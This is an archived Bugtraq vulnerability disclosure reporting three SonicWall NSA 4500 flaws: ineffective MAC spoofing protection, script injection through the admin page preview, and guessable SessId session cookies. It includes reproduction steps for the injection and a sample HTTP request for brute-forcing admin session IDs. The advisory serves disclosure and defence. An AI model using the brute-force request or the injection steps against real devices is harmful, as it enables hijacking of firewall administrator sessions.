[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple vulnerabilities in SonicWall
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple vulnerabilities in SonicWall
- From: hvazquez@xxxxxxxxxx
- Date: Tue, 4 Oct 2011 11:20:03 GMT
While pentesting a a WIFI network on a customer, we found some vulnerabilities
in the SonicWall NSA 4500. You can find details here:
http://www.pentest.es/vulns_sonicpoint.txt
--------------------------------------------------
Title:
======
SonicWall products with incompatible MAC spoofing protection
Date:
=====
2011-09-29
Introduction:
=============
The SonicWall NSA 4500 product has a MAC spoofing protection option that can be
activated in wireless networks per ESSID basis. This protection will not work
if the acces point is a Sonicpoint. No warning or notice is presented to the
administrator, wich means that protection will be active but not working. This
vulnerability has been detected while pentesting a customer WIFI deployment
with that configuration: SonicWall NSA 4500 + SonicWall Sonicpoints.
Report-Timeline:
================
2011-09-26: Vendor Notification
2011-09-28: Vendor Final Response
The vendor has confirmed the bug via customer support response.
Affected Products:
==================
SonicWall NSA 4500 + SonicWall Sonicpoints
Exploitation-Technique:
=======================
Common ARP spoofing attacks.
Severity:
=========
High. Customers don't know they are unprotected even if they have the MAC
spoofing activated.
Details:
========
--------------------------------------------------
Title:
======
SonicWall web admin interface múltiple code injection vulnerabilities
Date:
=====
2011-09-29
Introduction:
=============
The SonicWall NSA 4500 web admin interface offers the option of customize some
web pages directly from the admin interface. For this, the web interface has
some forms where the admin can put the code and test it via a preview feature.
This preview feature will show the page and execute all the javascript code
inside it in the web admin security context, wich leads to many traditional
attacks, like XSS, session hijacking...
Report-Timeline:
================
Not reported.
Affected Products:
==================
SonicWall NSA 4500
Exploitation-Technique:
=======================
Common code injection techniques (XSS)
Severity:
=========
Medium.
Details:
========
To reproduce the flaw, just go to main.html, Users->Settings and in the "Login
page content" put whatever code you want and it will be executed in the admin
context. This behaviour is a dangerous feature of the web admin interface,
because it can be exploited and triggered in several ways by an attacker. There
are other fields other than "Login page content" that can be exploited in the
same way.
--------------------------------------------------
Title:
======
SonicWall weak HTTP session ID's
Date:
=====
2011-09-29
Introduction:
=============
The SonicWall NSA 4500 web admin interface generates session ID's that are
stored in the "SessId" cookie variable. The ID's are guessable via brute force,
wich leads to admin session hijacking.
Report-Timeline:
================
Not reported.
Affected Products:
==================
SonicWall NSA 4500
Exploitation-Technique:
=======================
To brute force, just make requests like this:
GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111
Where SessId is the variable that we are bruteforcing -it should change in
every request- and Host is the SonicWall IP.
If you fail you get a 404 HTTP response. If you succeed, you will get a 200
HTTP response, and will see the SonicWall logs.
Severity:
=========
Medium.
Details:
========
HTTP "SessId" bruteforce. From a LAN, 10% of all ID's can be bruteforced in 1
day. The more administrator are logged the more dangerous is the scenario, and
easier is the brute force attack.
--------------------------------------------------
info@xxxxxxxxxx
Hugo Vázquez Caramés
PENTEST Consultores